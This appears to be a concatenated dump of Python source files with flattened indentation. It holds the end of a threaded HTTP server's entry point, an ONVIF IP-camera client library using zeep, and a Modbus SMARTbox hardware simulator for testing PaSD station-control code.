cache_executor = ThreadPoolExecutor(max_workers=1)
rate_limiter = Limiter()
httpd = AsyncHTTPServer(service_cfg[0], service_cfg[1],
cache.get, cache_executor, rate_limiter)
setup_signal_handlers(httpd)
# start the server event loop on its own thread
httpd_thread = threading.Thread(target=httpd.run)
httpd_thread.start()
while httpd.is_running():
time.sleep(0.2)
httpd_thread.join()
if __name__ == '__main__':
main() |
client.py | from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from urllib.parse import urlparse
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
# Ensure methods to raise an ONVIFError Exception
# when some thing was wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameToken):
"""
UsernameDigestToken class, with a time offset parameter that can be adjusted;
This allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
"""
def __init__(self, user, passw, dt_diff=None, **kwargs):
super().__init__(user, passw, **kwargs)
self.dt_diff = dt_diff # Date/time difference in datetime.timedelta
def apply(self, envelope, headers):
old_created = self.created
if self.created is None:
self.created = dt.datetime.utcnow()
if self.dt_diff is not None:
self.created += self.dt_diff
result = super().apply(envelope, headers)
self.created = old_created
return result
class ONVIFService(object):
"""
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
"""
Call the real onvif Service operations,
See the official wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
"""
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client, name))
class ONVIFCamera(object):
"""
Python Implementation of an ONVIF compliant device.
This class integrates ONVIF services
adjust_time parameter allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
Also, this cannot be used on AXIS camera, as every request is authenticated, contrary to ONVIF standard
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> ptz_service.GetConfiguration()
"""
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None}
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
"wsdl"),
encrypt=True, daemon=False, no_cache=False, adjust_time=False,
transport=None, replace_netloc=False):
os.environ.pop('http_proxy', None)
os.environ.pop('https_proxy', None)
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.transport = transport
# Active service client container
self.services = {}
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs(replace_netloc)
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self, replace_netloc=False):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time:
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt = self.create_devicemgmt_service()
# Get XAddr of services on the device
self.xaddrs = {}
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name in capabilities:
capability = capabilities[name]
try:
if name.lower() in SERVICES and capability is not None:
ns = SERVICES[name.lower()]['ns']
xaddr = capability['XAddr']
if replace_netloc:
xaddr = urlparse(xaddr)
xaddr = xaddr._replace(netloc = '%s:%s' % (self.host, self.port))
xaddr = xaddr.geturl()
self.xaddrs[ns] = xaddr
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
except Exception:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
"""Returns xaddr and wsdl of specified service"""
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
binding_name = '{%s}%s' % (ns, SERVICES[name]['binding'])
if portType:
ns += '/' + portType
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = '%s:%s/onvif/device_service' % \
(self.host if (self.host.startswith('http://') or self.host.startswith('https://'))
else 'http://%s' % self.host, self.port)
return xaddr, wsdlpath, binding_name
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError("Device doesn't support service: %s" % name)
return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
"""
Create ONVIF service client.
:param name: service name, should be present as a key within
the `SERVICES` dictionary declared within the `onvif.definition` module
:param portType:
:param transport:
:return:
"""
"""Create ONVIF service client"""
name = name.lower()
xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
with self.services_lock:
if not transport:
transport = self.transport
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.encrypt,
self.daemon, no_cache=self.no_cache,
dt_diff=self.dt_diff,
binding_name=binding_name,
transport=transport)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, transport=None):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', transport=transport)
def create_media_service(self, transport=None):
return self.create_onvif_service('media', transport=transport)
def create_ptz_service(self, transport=None):
return self.create_onvif_service('ptz', transport=transport)
def create_imaging_service(self, transport=None):
return self.create_onvif_service('imaging', transport=transport)
def create_deviceio_service(self, transport=None):
return self.create_onvif_service('deviceio', transport=transport)
def create_events_service(self, transport=None):
return self.create_onvif_service('events', transport=transport)
def create_analytics_service(self, transport=None):
return self.create_onvif_service('analytics', transport=transport)
def create_recording_service(self, transport=None):
return self.create_onvif_service('recording', transport=transport)
def create_search_service(self, transport=None):
return self.create_onvif_service('search', transport=transport)
def create_replay_service(self, transport=None):
return self.create_onvif_service('replay', transport=transport)
def create_pullpoint_service(self, transport=None):
return self.create_onvif_service('pullpoint',
portType='PullPointSubscription',
transport=transport)
def create_receiver_service(self, transport=None):
return self.create_onvif_service('receiver', transport=transport)
def create_notification_service(self, transport=None):
return self.create_onvif_service('notification', transport=transport)
def create_subscription_service(self, transport=None):
return self.create_onvif_service('subscription', transport=transport)
|
sim_smartbox.py | #!/usr/bin/env python
"""
Simulates a SMARTbox, acting as a Modbus slave and responding to 0x03, 0x06 and 0x10 Modbus commands
to read and write registers. Used for testing PaSD code.
"""
import logging
import random
import threading
import time
logging.basicConfig()
from pasd import smartbox
RETURN_BIAS = 0.005
STATUS_STRING = """\
Simulated SMARTBox at address: %(modbus_address)s:
ModBUS register revision: %(mbrv)s
PCB revision: %(pcbrv)s
CPU ID: %(cpuid)s
CHIP ID: %(chipid)s
Firmware revision: %(firmware_version)s
Uptime: %(uptime)s seconds
R.Address: %(station_value)s
48V In: %(incoming_voltage)4.2f V (%(incoming_voltage_state)s)
5V out: %(psu_voltage)4.2f V (%(psu_voltage_state)s)
PSU Temp: %(psu_temp)4.2f deg C (%(psu_temp_state)s)
PCB Temp: %(pcb_temp)4.2f deg C (%(pcb_temp_state)s)
Outside Temp: %(outside_temp)4.2f deg C (%(outside_temp_state)s)
Status: %(statuscode)s (%(status)s)
Service LED: %(service_led)s
Indicator: %(indicator_code)s (%(indicator_state)s)
Initialised: %(initialised)s
Online: %(online)s
"""
def random_walk(current_value, mean, scale=1.0, return_bias=RETURN_BIAS):
"""
Take the current and desired mean values of a simulated sensor value, and generate the next value,
to simulate a random walk around the mean value, with a bias towards returning to the mean.
With scale=1.0, typical variation over 1000 samples is roughly +/- 2.0
:param current_value: Current sensor value, arbitrary units
:param mean: Desired mean value
:param scale: Scale factor for variations - a scale of one means random jumps of -1% to +1% every time step
:param return_bias: Dimensionless factor - must be less than one. Lower values increase long-term variation around the mean
:return: Next value for the sensor reading
"""
# with scale=1.0, value varies by +/- 1% of the mean value every iteration
# with return_bias=1.0, value pulled back back by 100% of the offset from the mean at each iteration
# random walk part, +/- scale percent return bias part
return current_value + (mean * scale * ((random.random() - 0.5) * 0.02)) + (return_bias * (mean - current_value))
class SimSMARTbox(smartbox.SMARTbox):
"""
An instance of this class simulates a single SMARTbox, acting as a Modbus slave and responding to 0x03, 0x06 and
0x10 Modbus commands to read and write registers.
"""
def __init__(self, conn=None, modbus_address=None, logger=None):
# Inherited from the controller code in pasd/smartbox.py
smartbox.SMARTbox.__init__(self, conn=conn, modbus_address=modbus_address, logger=logger)
self.mbrv = 1 # Modbus register-map revision number for this physical SMARTbox
self.pcbrv = 1 # PCB revision number for this physical SMARTbox
self.register_map = smartbox.SMARTBOX_REGISTERS[1] # Assume register map version 1
self.sensor_temps = {i:33.33 for i in range(1, 13)} # Dictionary with sensor number (1-12) as key, and temperature as value
self.cpuid = 1 # CPU identifier (integer)
self.chipid = bytes([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) # Unique ID number (16 bytes), different for every physical SMARTbox
self.firmware_version = 1 # Firmware revision mumber for this physical SMARTbox
self.uptime = 0 # Time in seconds since this SMARTbox was powered up
self.station_value = modbus_address # Modbus address read back from the SYS_ADDRESS register - should always equal modbus_address
self.incoming_voltage = 46.9 # Measured voltage for the (nominal) 48VDC input power (Volts)
self.psu_voltage = 5.1 # Measured output voltage for the internal (nominal) 5V power supply
self.psu_temp = 28.0 # Temperature of the internal 5V power supply (deg C)
self.pcb_temp = 27.0 # Temperature on the internal PCB (deg C)
self.outside_temp = 24.0 # Outside temperature (deg C)
self.statuscode = smartbox.STATUS_UNINITIALISED # Status value, one of the smartbox.STATUS_* globals, and used as a key for smartbox.STATUS_CODES (eg 0 meaning 'OK')
self.status = 'UNINITIALISED' # Status string, obtained from smartbox.STATUS_CODES global (eg 'OK')
self.service_led = False # True if the blue service indicator LED is switched ON.
self.indicator_code = smartbox.LED_GREENFAST # LED status value, one of the smartbox.LED_* globals, and used as a key for smartbox.LED_CODES
self.indicator_state = 'GREENFAST' # LED status string, obtained from smartbox.LED_CODES
self.readtime = 0 # Unix timestamp for the last successful polled data from this SMARTbox
self.pdoc_number = None # Physical PDoC port on the FNDH that this SMARTbox is plugged into. Populated by the station initialisation code on powerup
# Only in the smartbox simulator class
self.start_time = time.time() # Unix timestamp when this instance started processing
self.initialised = False # True if the system has been initialised by the LMC
self.online = False # Will be True if we've heard from the MCCS in the last 300 seconds.
self.shortpress = False # Set to True to simulate a short button press (cleared when it's handled)
self.mediumpress = False # Set to True to simulate a medium button press (cleared when it's handled)
self.longpress = False # Set to True to simulate a long button press (never cleared)
self.wants_exit = False # Set to True externally to kill self.mainloop if the box is pseudo-powered-off
# Sensor states, with four thresholds for hysteris (alarm high, warning high, warning low, alarm low)
# Each has three possible values (OK, WARNING or RECOVERY)
self.sensor_states = {regname:'UNINITIALISED' for regname in self.register_map['CONF'] if not regname.endswith('_CURRENT_TH')}
# Port current states, with only one (high) threshold, and fault handling internally. Can only be OK or ALARM
self.portcurrent_states = {regname:'OK' for regname in self.register_map['CONF'] if regname.endswith('_CURRENT_TH')}
def __str__(self):
tmpdict = self.__dict__.copy()
tmpdict['incoming_voltage_state'] = self.sensor_states['SYS_48V_V_TH']
tmpdict['psu_voltage_state'] = self.sensor_states['SYS_PSU_V_TH']
tmpdict['psu_temp_state'] = self.sensor_states['SYS_PSUTEMP_TH']
tmpdict['pcb_temp_state'] = self.sensor_states['SYS_PCBTEMP_TH']
tmpdict['outside_temp_state'] = self.sensor_states['SYS_OUTTEMP_TH']
return STATUS_STRING % (tmpdict) + "\nPorts:\n" + ("\n".join([str(self.ports[pnum]) for pnum in range(1, 13)]))
def poll_data(self):
"""
Stub, not needed for simulated SMARTbox
"""
pass
def read_uptime(self):
"""
Stub, not needed for simulated SMARTbox
"""
pass
def write_thresholds(self):
"""
Stub, not needed for simulated SMARTbox
"""
pass
def write_portconfig(self):
"""
Stub, not needed for simulated SMARTbox
"""
pass
def configure(self, thresholds=None, portconfig=None):
"""
Stub, not needed for simulated SMARTbox
"""
pass
def loophook(self):
"""
Stub, overwrite if you subclass this to handle more complex simulation. Called every time a packet has
finished processing, or every few seconds if there haven't been any packets.
Don't do anything that takes a long time in here - this is called in the packet handler thread.
:return: None
"""
pass
def listen_loop(self):
"""
Listen on the socket for any incoming read/write register packets sent by an external bus master (eg, the MCCS).
The transport.Connection.listen_for_packet() method exits after the first valid packet processed, to allow
the calling code to handle side-effects from register read/write operations (for example, multiple reads from
the same register block returning different values). This code loops forever, and each time, it:
1) Sets up the slave_registers dictionary with the current box state.
3) Calls self.conn.listen_for_packet(), which returns all of the register numbers read or written by a packet
(if one was processed in that call). If no packets are received, it will return at the specified maxtime.
4) Uses the list of written registers to update the box state, and update the 'heard from MCCS' timestamp.
5) If any registers are in the 'read' list, update the 'heard from MCCS' timestamp.
Note that we traverse around the loop whenever we process an incoming packet, or when waiting for a packet
times out after around a second.
:return: None
"""
while not self.wants_exit: # Process packets until we are told to die
# Set up the registers for the physical->smartbox/port mapping:
slave_registers = {}
self.uptime = int(time.time() - self.start_time) # Set the current uptime value
# Copy the local simulated instance data to the temporary registers dictionary - first the POLL registers
for regname in self.register_map['POLL']:
regnum, numreg, regdesc, scalefunc = self.register_map['POLL'][regname]
if regname == 'SYS_MBRV':
slave_registers[regnum] = self.mbrv
elif regname == 'SYS_PCBREV':
slave_registers[regnum] = self.pcbrv
elif regname == 'SYS_CPUID':
slave_registers[regnum], slave_registers[regnum + 1] = divmod(self.cpuid, 65536)
elif regname == 'SYS_CHIPID':
for i in range(numreg):
slave_registers[regnum + i] = self.chipid[i // 2] * 256 + self.chipid[i // 2 + 1]
elif regname == 'SYS_FIRMVER':
slave_registers[regnum] = self.firmware_version
elif regname == 'SYS_UPTIME':
slave_registers[regnum], slave_registers[regnum + 1] = divmod(self.uptime, 65536)
elif regname == 'SYS_ADDRESS':
slave_registers[regnum] = self.station_value
elif regname == 'SYS_48V_V':
slave_registers[regnum] = scalefunc(self.incoming_voltage, reverse=True, pcb_version=self.pcbrv)
elif regname == 'SYS_PSU_V':
slave_registers[regnum] = scalefunc(self.psu_voltage, reverse=True, pcb_version=self.pcbrv)
elif regname == 'SYS_PSUTEMP':
slave_registers[regnum] = scalefunc(self.psu_temp, reverse=True, pcb_version=self.pcbrv)
elif regname == 'SYS_PCBTEMP':
slave_registers[regnum] = scalefunc(self.pcb_temp, reverse=True, pcb_version=self.pcbrv)
elif regname == 'SYS_OUTTEMP':
slave_registers[regnum] = scalefunc(self.outside_temp, reverse=True, pcb_version=self.pcbrv)
elif regname == 'SYS_STATUS':
slave_registers[regnum] = self.statuscode
elif regname == 'SYS_LIGHTS':
slave_registers[regnum] = int(self.service_led) * 256 + self.indicator_code
elif (regname[:9] == 'SYS_SENSE'):
sensor_num = int(regname[9:])
slave_registers[regnum] = scalefunc(self.sensor_temps[sensor_num], reverse=True, pcb_version=self.pcbrv)
elif (len(regname) >= 8) and ((regname[0] + regname[-6:]) == 'P_STATE'):
pnum = int(regname[1:-6])
slave_registers[regnum] = self.ports[pnum].status_to_integer(write_state=True, write_to=True)
elif (len(regname) >= 10) and ((regname[0] + regname[-8:]) == 'P_CURRENT'):
pnum = int(regname[1:-8])
slave_registers[regnum] = self.ports[pnum].current_raw
# Now copy the configuration data to the temporary register dictionary
for regname in self.register_map['CONF']:
regnum, numreg, regdesc, scalefunc = self.register_map['CONF'][regname]
if numreg == 1:
slave_registers[regnum] = scalefunc(self.thresholds[regname], pcb_version=self.pcbrv, reverse=True)
elif numreg == 4:
(slave_registers[regnum],
slave_registers[regnum + 1],
slave_registers[regnum + 2],
slave_registers[regnum + 3]) = (scalefunc(x, pcb_version=self.pcbrv, reverse=True) for x in self.thresholds[regname])
else:
self.logger.critical('Unexpected number of registers for %s' % regname)
# Wait up to one second for an incoming packet. On return, we get a set of registers numbers that were
# read by that packet, and a set of register numbers that were written to by that packet. The
# temporary slave_registers dictionary has new values for each register in the written_set.
try:
read_set, written_set = self.conn.listen_for_packet(listen_address=self.modbus_address,
slave_registers=slave_registers,
maxtime=1,
validation_function=None)
except:
self.logger.exception('Exception in transport.listen_for_packet():')
time.sleep(1)
continue
if read_set or written_set: # The MCCS has talked to us, update the self.readtime timestamp
self.readtime = time.time()
# If any registers have been written to, update the local instance attributes from the new values
if written_set:
self.handle_register_writes(slave_registers, written_set)
# Update the on/off state of all the ports, based on local instance attributes
goodcodes = [smartbox.STATUS_OK, smartbox.STATUS_WARNING]
if (self.statuscode not in goodcodes): # If we're not OK or WARNING disable all the outputs
for port in self.ports.values():
port.status_timestamp = time.time()
port.current_timestamp = port.status_timestamp
port.system_level_enabled = False
port.power_state = False
else: # Otherwise, set the output state based on online/offline status and the four desired_state bits
for port in self.ports.values():
port.status_timestamp = time.time()
port.current_timestamp = port.status_timestamp
port.system_level_enabled = True
port_on = False
port.current_raw = 0
port.current = 0.0
if ( ( (self.online and port.desire_enabled_online)
or ((not self.online) and port.desire_enabled_offline)
or (port.locally_forced_on) )
and (not port.locally_forced_off) ):
port_on = True
port.current_raw = 2048
port.current = 2048.0
port.power_state = port_on
self.loophook()
self.logger.info('Ending listen_loop() in SimSMARTbox')
def handle_register_writes(self, slave_registers, written_set):
"""
Take the modified temporary slave_registers dictionary, and the set of register numbers that were modified by
the packet, and update the local instance attributes.
Note that writes to many registers are ignored by the SMARTbox, as the data is read-only, so this function
only needs to handle changes to registers that are R/W.
:param slave_registers: Dictionary, with register number as the key and register contents as the value
:param written_set: A set() of register numbers that were modified by the most revent packet.
:return: None
"""
# First handle the port state bitmap registers
for regnum in range(self.register_map['POLL']['P01_STATE'][0], self.register_map['POLL']['P12_STATE'][0] + 1):
if regnum in written_set:
port = self.ports[(regnum - self.register_map['POLL']['P01_STATE'][0]) + 1]
status_bitmap = slave_registers[regnum]
bitstring = "{:016b}".format(status_bitmap)
# Desired state online - R/W, write 00 if no change to current value
if (bitstring[2:4] == '10'):
port.desire_enabled_online = False
elif (bitstring[2:4] == '11'):
port.desire_enabled_online = True
elif (bitstring[2:4] == '00'):
pass
else:
self.logger.warning('Unknown desire enabled online flag: %s' % bitstring[2:4])
port.desire_enabled_online = None
# Desired state offline - R/W, write 00 if no change to current value
if (bitstring[4:6] == '10'):
port.desire_enabled_offline = False
elif (bitstring[4:6] == '11'):
port.desire_enabled_offline = True
elif (bitstring[4:6] == '00'):
pass
else:
self.logger.warning('Unknown desired state offline flag: %s' % bitstring[4:6])
port.desire_enabled_offline = None
# Technician override - R/W, write 00 if no change to current value
if (bitstring[6:8] == '10'):
port.locally_forced_on = False
port.locally_forced_off = True
elif (bitstring[6:8] == '11'):
port.locally_forced_on = True
port.locally_forced_off = False
elif (bitstring[6:8] == '01'):
port.locally_forced_on = False
port.locally_forced_off = False
else:
pass
if bitstring[8] == '1': # Reset breaker if 1, ignore if 0
port.breaker_tripped = False
# Now update ay new threshold data from the configuration registers.
for regname in self.register_map['CONF']:
regnum, numreg, regdesc, scalefunc = self.register_map['CONF'][regname]
if regnum in written_set:
if numreg == 1:
self.thresholds[regname] = scalefunc(slave_registers[regnum], pcb_version=self.pcbrv)
else:
self.thresholds[regname] = [scalefunc(slave_registers[x], pcb_version=self.pcbrv) for x in range(regnum, regnum + 4)]
# Now update the service LED state (data in the LSB is ignored, because the microcontroller handles the
# status LED).
if self.register_map['POLL']['SYS_LIGHTS'][0] in written_set: # Wrote to SYS_LIGHTS, so set light attributes
msb, lsb = divmod(slave_registers[self.register_map['POLL']['SYS_LIGHTS'][0]], 256)
self.service_led = bool(msb)
if self.register_map['POLL']['SYS_STATUS'][0] in written_set: # Wrote to SYS_STATUS, so clear UNINITIALISED state
self.initialised = True
def sim_loop(self):
"""
Runs continuously, simulating hardware processes independent of the communications packet handler.
Starts the Modbus communications handler (receiving and processing packets) in a different thread, so simulation
actions don't hold up packet handling.
:return: None
"""
random.seed() # Ensure different random walks for sensors in each smartbox thread
self.start_time = time.time()
self.logger.info('Started comms thread for SMARTbox')
listen_thread = threading.Thread(target=self.listen_loop, daemon=False, name=threading.current_thread().name + '-C')
listen_thread.start()
self.statuscode = smartbox.STATUS_UNINITIALISED
self.status = 'UNINITIALISED'
self.indicator_code = smartbox.LED_YELLOWFAST # Fast flash green - uninitialised
self.indicator_state = 'YELLOWFAST'
self.logger.info('Started simulation loop for SMARTbox')
while not self.wants_exit: # Process packets until we are told to die
self.uptime = int(time.time() - self.start_time) # Set the current uptime value
# Update the online/offline state, depending on how long it's been since the MCCS last sent a packet to us
# Note that the port powerup/powerdown as a result of online/offline transitions is handled in the listen_loop
if (time.time() - self.readtime >= 300) and self.online: # More than 5 minutes since we heard from MCCS, go offline
self.online = False
for port in self.ports.values():
port.system_online = False
elif (time.time() - self.readtime < 300) and (not self.online): # Less than 5 minutes since we heard from MCCS, go online
self.online = True
for port in self.ports.values():
port.system_online = True
time.sleep(0.5)
# Change the sensor values to generate a random walk around a mean value for each sensor
self.incoming_voltage = random_walk(self.incoming_voltage, mean=46.1, scale=0.5)
self.psu_voltage = random_walk(self.psu_voltage, mean=5.1, scale=0.05)
self.psu_temp = random_walk(self.psu_temp, mean=28.3, scale=0.5)
self.pcb_temp = random_walk(self.pcb_temp, mean=27.0, scale=0.5)
self.outside_temp = random_walk(self.outside_temp, mean=24.0, scale=0.5)
if self.initialised: # Don't bother thresholding sensor values until the thresholds have been set
# For each threshold register, get the current value and threshold/s from the right local instance attribute
for regname in self.register_map['CONF']:
if regname.endswith('_CURRENT_TH'):
curstate = self.portcurrent_states[regname]
ah = self.thresholds[regname]
wh, wl, al = ah, -1, -2 # Only one threshold for port current, hysteresis handled in firmware
curvalue = self.ports[int(regname[1:3])].current
else:
curstate = self.sensor_states[regname]
ah, wh, wl, al = self.thresholds[regname]
if regname == 'SYS_48V_V_TH':
curvalue = self.incoming_voltage
elif regname == 'SYS_PSU_V_TH':
curvalue = self.psu_voltage
elif regname == 'SYS_PSUTEMP_TH':
curvalue = self.psu_temp
elif regname == 'SYS_PCBTEMP_TH':
curvalue = self.pcb_temp
elif regname == 'SYS_OUTTEMP_TH':
curvalue = self.outside_temp
elif regname.startswith('SYS_SENSE'):
curvalue = self.sensor_temps[int(regname[9:11])]
else:
self.logger.critical('Configuration register %s not handled by simulation code')
return
# Now use the current value and threshold/s to find the new state for that sensor
newstate = curstate
if curvalue > ah:
newstate = 'ALARM'
elif wh < curvalue <= ah:
if curstate == 'ALARM':
newstate = 'RECOVERY'
elif curstate != 'RECOVERY':
newstate = 'WARNING'
elif wl <= curvalue <= wh:
newstate = 'OK'
elif al <= curvalue < wl:
if curstate == 'ALARM':
newstate = 'RECOVERY'
elif curstate != 'RECOVERY':
newstate = 'WARNING'
elif curvalue < al:
newstate = 'ALARM'
# Log any change in state
if curstate != newstate:
msg = 'Sensor %s transitioned from %s to %s with reading of %4.2f and thresholds of %3.1f,%3.1f,%3.1f,%3.1f'
self.logger.warning(msg % (regname[:-3],
curstate,
newstate,
curvalue,
ah,wh,wl,al))
# Record the new state for that sensor in a dictionary with all sensor states
if regname.endswith('_CURRENT_TH'):
self.portcurrent_states[regname] = newstate
else:
self.sensor_states[regname] = newstate
if self.shortpress: # Unhandled short button press - reset any faults and technician overrides, try again
self.logger.info('Short button press detected.')
# Change any 'RECOVERY' sensor states to WARNING
for regname, value in self.portcurrent_states.items():
if value == 'RECOVERY':
self.portcurrent_states[regname] = 'WARNING'
for regname, value in self.sensor_states.items():
if value == 'RECOVERY':
self.sensor_states[regname] = 'WARNING'
# Clear any port locally_forced_* bits
# And reset any tripped software breakers
for p in self.ports.values():
p.locally_forced_on = False
p.locally_forced_off = False
p.breaker_tripped = False
self.shortpress = False # Handled, so clear the flag
if self.mediumpress:
self.logger.info('Medium button press detected.')
# Force all the FEM ports off
for p in self.ports.values():
p.locally_forced_on = False
p.locally_forced_off = True
self.mediumpress = False
if self.longpress:
if self.statuscode != smartbox.STATUS_POWERDOWN:
self.logger.info('Long button press detected.') # Only log this once, not every loop
# Ask for a shutdown
# Force all the FEM ports off
for p in self.ports.values():
p.locally_forced_on = False
p.locally_forced_off = True
self.statuscode = smartbox.STATUS_POWERDOWN
self.indicator_code = smartbox.LED_GREENRED
self.indicator_state = 'GREENRED'
continue
# Now update the overall box state, based on all of the sensor states
if self.initialised:
if 'ALARM' in self.sensor_states.values(): # If any sensor is in ALARM, so is thw whole box
self.statuscode = smartbox.STATUS_ALARM
if self.online:
self.indicator_code = smartbox.LED_REDSLOW
else:
self.indicator_code = smartbox.LED_RED
elif 'RECOVERY' in self.sensor_states.values(): # Otherwise, if any sensor is RECOVERY, so is the whole box
self.statuscode = smartbox.STATUS_RECOVERY
if self.online:
self.indicator_code = smartbox.LED_YELLOWREDSLOW
else:
self.indicator_code = smartbox.LED_YELLOWRED
elif 'WARNING' in self.sensor_states.values(): # Otherwise, if any sensor is WARNING, so is the whole box
self.statuscode = smartbox.STATUS_WARNING
if self.online:
self.indicator_code = smartbox.LED_YELLOWSLOW
else:
self.indicator_code = smartbox.LED_YELLOW
else:
self.statuscode = smartbox.STATUS_OK # If all sensors are OK, so is the whole box
if self.online:
self.indicator_code = smartbox.LED_GREENSLOW
else:
self.indicator_code = smartbox.LED_GREEN
else:
self.statuscode = smartbox.STATUS_UNINITIALISED
self.indicator_code = smartbox.LED_YELLOWFAST # Fast flash green - uninitialised
self.status = smartbox.STATUS_CODES[self.statuscode]
self.indicator_state = smartbox.LED_CODES[self.indicator_code]
self.logger.info('Ending sim_loop() in SimSMARTbox')
"""
Use as 'simulate.py smartbox', or:
from pasd import transport
from simulate import sim_smartbox
conn = transport.Connection(hostname='134.7.50.185') # address of ethernet-serial bridge
# or
conn = transport.Connection(devicename='/dev/ttyS0') # or 'COM5' for example, under Windows
s = sim_smartbox.SimSMARTbox(conn=conn, modbus_address=1)
s.sim_loop()
"""
|
20a.py | ## fib.py
